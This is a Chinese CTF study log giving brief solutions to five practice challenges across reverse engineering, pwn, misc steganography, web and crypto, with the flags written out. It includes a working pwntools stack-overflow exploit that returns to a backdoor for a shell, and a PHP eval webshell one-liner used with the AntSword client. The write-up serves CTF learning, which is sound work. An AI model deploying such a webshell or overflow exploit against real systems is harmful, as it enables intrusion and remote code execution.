2.7学习记录
re
[WUSTCTF2020]Cr0ssfun
得到附件先查壳无壳elf64位文件,放进ida查看主调函数往下追踪,发现7部分相似的结构,给的数字看上去像是ASCII码,对照码表把7部分串联起来得到:wctf2020{cpp_@nd_r3verse_@re_fun}
pwn
rip
先查壳发现没有保护,64位elf文件,放ida里看看发现后门函数,在主调函数处发现gets函数,存在栈溢出控制程序返回到0x40201B,就可以得到系统的shell了
exp
from pwn import * #调用pwntools库
r = remote('node3.buuoj.cn',27542) #远程连接
offset = 0xF + 8 #偏移量
payload = offset * 'a' + p64(0x40201B) #漏洞利用
r.sendline(payload) #发送漏洞
r.interactive() #远程交互
misc
LSB
这题题目是校徽,根据提示猜测是lsb隐写
采用stegsolve工具调整最低位宽,之后点击Save Bin保存文件,发现是个二维码,用cqr扫描即可
web
[极客大挑战 2019]Knife
根据提示构造木马
/?<?php eval($_POST["Syc"]);?>
之后用蚁剑连接即可找到flag了
crypto
Alice与Bob
题目描述很有意思:密码学历史中,有两位知名的杰出人物,Alice和Bob。他们的爱情经过置换和轮加密也难以混淆,即使是没有身份认证也可以知根知底。就像在数学王国中的素数一样,孤傲又热情。下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。
用在线工具分解安装题目要求排列一下即可,得到flag{d450209323a847c8d01c6be47c81811a}